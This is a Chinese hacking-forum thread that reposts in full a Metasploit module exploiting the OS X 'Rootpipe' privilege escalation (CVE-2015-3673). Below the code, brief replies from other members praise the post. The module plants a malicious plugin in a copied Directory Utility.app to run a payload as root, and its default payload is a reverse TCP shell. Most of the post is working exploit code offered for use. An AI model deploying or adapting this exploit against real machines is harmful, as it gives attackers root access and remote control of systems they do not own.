查看: 99628|回复: 497

Apple OS X Entitlements Rootpipe Privilege Escalation Exploit

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-8-29 19:34:34 | 显示全部楼层 |阅读模式
    CVE-2015-3673

    [C] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
     
    class Metasploit4 < Msf::Exploit::Local
     
      Rank = GreatRanking
     
      include Msf::Post::OSX::System
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
          'Description'    => %q{
            This module exploits the rootpipe vulnerability and bypasses Apple's initial
            fix for the issue by injecting code into a process with the 'admin.writeconfig'
            entitlement.
          },
          'Author'         => [
            'Emil Kvarnhammar', # Vulnerability discovery and PoC
            'joev'              # Copy/paste monkey
          ],
          'References'     => [
            ['CVE',   '2015-3673'],
            ['URL',   'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
          ],
          'DisclosureDate' => 'Jul 1 2015',
          'License'        => MSF_LICENSE,
          'Platform'       => 'osx',
          'Arch'           => ARCH_X86_64,
          'SessionTypes'   => ['shell'],
          'Privileged'     => true,
          'Targets'        => [
            ['Mac OS X 10.9-10.10.3', {}]
          ],
          'DefaultTarget'  => 0,
          'DefaultOptions' => {
            'PAYLOAD'         => 'osx/x64/shell_reverse_tcp',
            'PrependSetreuid' => true
          }
        ))
     
        register_options([
          OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
        ])
      end
     
      def check
        if ver? && admin?
          vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
     
      def exploit
        print_status("Copying Directory Utility.app to #{new_app}")
        cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
        cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
     
        print_status("Writing bundle plist to `#{plist_file}'")
        write_file(plist_file, plist)
     
        print_status("Writing payload to `#{payload_file}'")
        write_file(payload_file, binary_payload)
        register_file_for_cleanup(payload_file)
     
        print_status("Writing malicious shared library to `#{exploit_file}'")
        write_file(exploit_file, plugin_exploit)
     
        print_status("Running Directory Utility.app")
        cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
     
        print_status("Deleting Directory Utility.app")
        cmd_exec('rm -Rf "#{new_app}"')
     
        print_status('Executing payload...')
        cmd_exec("/bin/sh -c '#{root_file} &'")
      end
     
      def ver?
        Gem::Version.new(get_sysinfo['ProductVersion']).between?(
          Gem::Version.new('10.9'), Gem::Version.new('10.10.3')
        )
      end
     
      def admin?
        cmd_exec('groups | grep -wq admin && echo true') == 'true'
      end
     
      def sploit
        "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
      end
     
      def plugin_exploit
        File.read(File.join(
          Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
        ))
      end
     
      def binary_payload
        Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
      end
     
      def exploit_file
        "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
      end
     
      def plist_file
        "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
      end
     
      def new_app
        @app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app"
      end
     
      def plist
        %Q|
          <?xml version="1.0" encoding="UTF-8"?>
          <plist version="1.0">
          <dict>
            <key>CFBundleGetInfoString</key>
            <string>RootpipeBundle</string>
            <key>CFBundleExecutable</key>
            <string>RootpipeBundle</string>
            <key>CFBundleIdentifier</key>
            <string>com.root.pipe</string>
            <key>CFBundleName</key>
            <string>RootpipeBundle</string>
            <key>CFBundleShortVersionString</key>
            <string>0.01</string>
            <key>CFBundleInfoDictionaryVersion</key>
            <string>6.0</string>
            <key>CFBundlePackageType</key>
            <string>APPL</string>
            <key>IFMajorVersion</key>
            <integer>0</integer>
            <key>IFMinorVersion</key>
            <integer>1</integer>
          </dict>
          </plist>
        |
      end
     
      def payload_file
        @payload_file ||=
          "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
      end
     
      def root_file
        @root_file ||=
          "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
      end
    end
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-8-30 12:26:41 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-8-30 16:43:48 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-8-31 08:24:14 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-31 22:32:37 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-9-1 00:08:11 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-1 02:13:14 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-1 16:00:17 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-9-2 12:17:57 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-9-3 11:30:05 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 05:34 , Processed in 0.027690 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部